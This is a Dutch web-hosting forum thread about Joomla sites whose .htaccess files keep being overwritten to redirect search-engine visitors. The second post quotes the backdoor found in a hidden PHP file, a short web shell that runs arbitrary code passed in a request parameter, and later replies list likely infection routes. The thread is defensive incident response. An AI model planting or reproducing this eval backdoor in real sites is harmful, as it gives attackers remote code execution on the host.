Resultaten 1 tot 4 van de 4
Geen
  1. #1
    Joomla htaccess hack
    geregistreerd gebruiker
    158 Berichten
    Ingeschreven
    04/04/10

    Locatie
    Gieterveen

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: 01181775
    Ondernemingsnummer: nvt

    Thread Starter

    Joomla htaccess hack

    Ik heb een klant die op zijn reseller pakket een groot aantal Joomla websites heeft gehost. Nu zijn deze websites een poosje geleden allemaal tegelijkertijd gehackt en vermoedelijk besmet geraakt met een vervelende exploit. Deze gaat om de zoveel tijd de .htaccess bestanden overschrijven en laat de website redirecten naar rare russische websites als mensen vanaf zoekmachines af komen (wanneer men op de site klikt op de zoekmachines dan verwijst de htaccess hun door naar een andere website).

    Heel vervelend maar het probleem is maar niet te vinden. De klant heeft door een volgens haar Joomla expert de site laten onderzoeken en deze heeft niks kunnen ontdekken. Het zou volgens de expert moeten liggen aan een applicatie die van binnenuit zou werken.

    Dat vind ik nogal een conclusie gezien deze expert geen inzage heeft gehad in logs en dergelijke. Dit heb ik wel meteen gedaan maar ik vond geen vreemde zaken. De sites draaien op een shared omgeving voorzien van DirectAdmin PHP met CLI en tevens is de server beveiligd met mod_ruid2. Alles wordt op gebruikerbasis uitgevoerd en ook andere gebruikersaccounts met Joomla websites zijn allemaal ongedeerd. Het lijkt mij dus echt te zitten in 1 van de websites van de klant.

    Het rare is alleen dat de klant alle .htaccess bestanden inmiddels heeft gechmod naar 444, waardoor PHP het niet meer zou mogen aanpassen 9heb ik met een los PHP script ook getest), maar dat dit niks helpt. Ik ben dus heel benieuwd wat dit kan zijn.

    Ik heb voor de zekerheid een flinke virusscan gedraaid over het gehele systeem en een rkhunter eens gedraaid, maar dit heeft niks opgeleverd, aan het systeem is verder ook niks raars te merken.En ik ben er eigenlijk ook wel zeker van dat dit systeem goed beveiligt is. Heeft iemand ervaring met deze exploid/hack en kan daar wat meer over vertellen?
    Laatst gewijzigd door guidonline; 05/09/12 om 01:05.

  2. #2
    Joomla htaccess hack
    geregistreerd gebruiker
    158 Berichten
    Ingeschreven
    04/04/10

    Locatie
    Gieterveen

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: 01181775
    Ondernemingsnummer: nvt

    Thread Starter
    Heb inmiddels een back-up gemaakt van de Joomla account en deze eens gescand met mijn desktop scanner (Eset NOD32) en ja hoor deze vond wel wat..;-) In \components\com_content\helpers\.jos_8z3.php stond dan ook het volgende:

    Code:
    <?php 
    if (isset($_REQUEST['p1'])) {
    	eval(stripslashes($_REQUEST['p1']));
    } else {
    	echo "djeu84m";
    }
    ?>
    Heb gauw de eval() verwijderd en dit vervangen door en mailfunctie. Zo kan ik nu loggen wat er uitgevoerd wordt.

    Als ik dit hier lees is het mogelijk de oorzaak: http://forum.joomla.org/viewtopic.ph...&view=previous
    Nu de klant alles van deze website laten doorlopen, ben beniuwd hoe dat bestand er terecht is gekomen.
    Laatst gewijzigd door guidonline; 05/09/12 om 01:38.

  3. #3
    Joomla htaccess hack
    moderator
    4.752 Berichten
    Ingeschreven
    21/02/09

    Locatie
    Noord-Holland

    Post Thanks / Like
    Mentioned
    25 Post(s)
    Tagged
    0 Thread(s)
    185 Berichten zijn liked


    Naam: D. Koop
    Bedrijf: Yourwebhoster.eu
    Functie: baas
    URL: yourwebhoster.eu
    KvK nummer: 32165429
    View danielkoop's profile on LinkedIn

    Citaat Oorspronkelijk geplaatst door guidonline Bekijk Berichten
    Nu de klant alles van deze website laten doorlopen, ben beniuwd hoe dat bestand er terecht is gekomen.
    Een aantal opties:
    • Outdated software
    • Malifide plugins / templates: hackers ontwikkelen plugins die een mooie functie hebben maar ook vervelende code. Ga na of het een veelgebruikte plugin is en scan de code eventueel.
    • FTP toegang (minst waarschijnlijk maar is mogelijk)
    Met vriendelijke groet, Yourwebhoster.eu - Managed VPS diensten met Epyc performance op 100% SSDs

    Lees hier de webhostingtalk.nl forum regels en voorwaarden!

  4. #4
    Joomla htaccess hack
    Sebastiaan Stok
    2.468 Berichten
    Ingeschreven
    20/12/04

    Locatie
    Rotterdam

    Post Thanks / Like
    Mentioned
    5 Post(s)
    Tagged
    0 Thread(s)
    86 Berichten zijn liked


    Naam: Sebastiaan Stok

    Zoals Yourhoster zegt, de computer van de klant zelf kan zijn geïnfecteerd en hiermee de site infecteren.
    Laat de klant Hitman pro draaien (eerste keer is gratis) en verander de wachtwoorden voor de zekerheid.

Webhostingtalk.nl

Contact

  • Rokin 113-115
  • 1012 KP, Amsterdam
  • Nederland
  • Contact
© Copyright 2001-2026 Webhostingtalk.nl.
Web Statistics